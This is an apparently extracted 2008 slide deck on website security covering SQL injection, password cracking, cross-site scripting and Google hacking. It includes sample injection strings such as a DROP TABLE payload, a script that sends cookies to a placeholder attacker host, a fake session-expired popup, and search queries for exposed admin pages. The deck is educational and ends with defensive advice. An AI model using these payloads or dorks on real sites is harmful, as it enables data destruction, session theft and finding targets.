Upload
lynhan
View
216
Download
0
Embed Size (px)
Citation preview
Website Security
Project
Some Techniques What Could Be Some Techniques What Could Be
Danger of Your Website
by
Bence Liska
2008-12-01
Website Security
We have to protect:
• Users’ information
(credit card, passwords, profiles, etc…)
• Users’ cookies and sessions• Users’ cookies and sessions
• The administration web forms
• Costumer information
• The content of the website
• The database of the website
Attack Types (Overviews)
Some techniques:
• SQL Injection
• Password Cracking
• Cross Site Scripting (XSS)• Cross Site Scripting (XSS)
• Google Hacking
• Etc…
SQL Injection (1)
• Entering SQL code into web forms, or into the
browser address field.
• You can get access to the website or the
database behind the site.
or
SQL Injection (2)
Example 1:
• At the Server:„SELECT * FROM users WHERE username = ‘” +$USRTEXT + „’ AND password = ‘” + $PASSTEXT + ”’;”$USRTEXT + „’ AND password = ‘” + $PASSTEXT + ”’;”
• SQL Injections:• ’ OR 1=1; --
• admin’; --
• ’) or (‘a’=’a
• ”) or (“a”=”a
• hi” or “a”=”a
Result:
„SELECT * FROM users WHERE username =
‘admin’; --’ AND password = ‘’;”
SQL Injection (3)
Example 2:
• At the Server:
„SELECT * FROM DATA WHERE id=” + $ID + ”;”
• SQL Injection:• 1;DROP TABLE users
• Result:
“SELECT * FROM DATA WHERE id=1;DROP TABLE users;”
SQL Injection (4)
• Preventing - Using Escaping
It is usual to escape parameters using the function
mysql_real_escape_string before sending the SQL query in PHP.
$query = sprintf("SELECT * FROM Users where
UserName ='%s' and Password='%s'",
mysql_real_escape_string($Username),
mysql_real_escape_string($Password));
mysql_query($query);
Password Cracking (1)
• Dictionary attack
Users often choose weak passwords. The
directory has a list of single words.
• Brute force attack• Brute force attack
This attack tries every possible password to
get access to the user account on the website.
(It is to slow.)
Password Cracking (2)
• Precomputation (Rainbow table)• Most website encrypts the user’s password (and name)
as a hash code. If we has a hash we can find the
plaintext by rainbow tables.
• Rainbow table: storing the (plaintext, ciphertext) pairs.• Rainbow table: storing the (plaintext, ciphertext) pairs.
• Preventing• Attackers must not get access even to the encrypted
password.
• The users have to use only strong passwords.
Cross Site Scripting (XSS)
• Typically found in web applications which
allow code injection by malicious web users
into the web pages viewed by other users.
1. „log” code
Attacker
User
Attacker’s web server
Website
1. „log” code
2. javascript code
3. login
4. send cookie
5. read the log
Example 1:
Other Cookie Theft Javascript:
<script>new Image().src="http://attacker/log.php?c="+encodeURI(document.cookie);</script>
Example 2:
Example 3:
<SCRIPT>var oF = window.open("","","width=275,
height=175, top=200, left=250 location=no, menubar=no, status=no, toolbar=no, scrollbars=no, resizable=no");
// HTML FORM with POST requestoF.document.write("Your session has expired"...);
</SCRIPT>
Google Hacking (1)
• Using Google (or other search engines),
"search engine hackers" can easily find
exploitable targets and sensitive data.
• Example 1:
Wordpress suffers from a possible XSS attacks.
Find Wordpress Login forms
intitle:"WordPress > * > Login form"
inurl:"wp-login.php"
Google Hacking (2)
• Example 2:
Phpinfo outputs lots of PHP information.<?php
// Show all information, defaults to INFO_ALL
phpinfo();
Find Phpinfo pages
intitle:phpinfo "PHP Version"
phpinfo();
// Show just the module information.
// phpinfo(8) yields identical results.
phpinfo(INFO_MODULES);
?>
Google Hacking (3)
• Example 3:
PhpMyAdmin is a Web UI for managing mySQL
databases.
Find PhpMyAdmin pages
inurl:main.php Welcome to phpMyAdmin
A Few Defensive Measures
• If you use CMS or other publishing platform or
framework you have to update to new versions as
soon as possible.
• If you have an admin page at your website do not call
“admin.php” or “AdminLogin.php” let’s rename it.
Call it for example “dog.php” or “hamburger.php”.
• Try to enter some confusing data into your login
fields like the sample Injection strings, and any else
which you think might confuse the server.
• Do a few Google hacks on your name and your
website. Just in case…
Thank you!Thank you!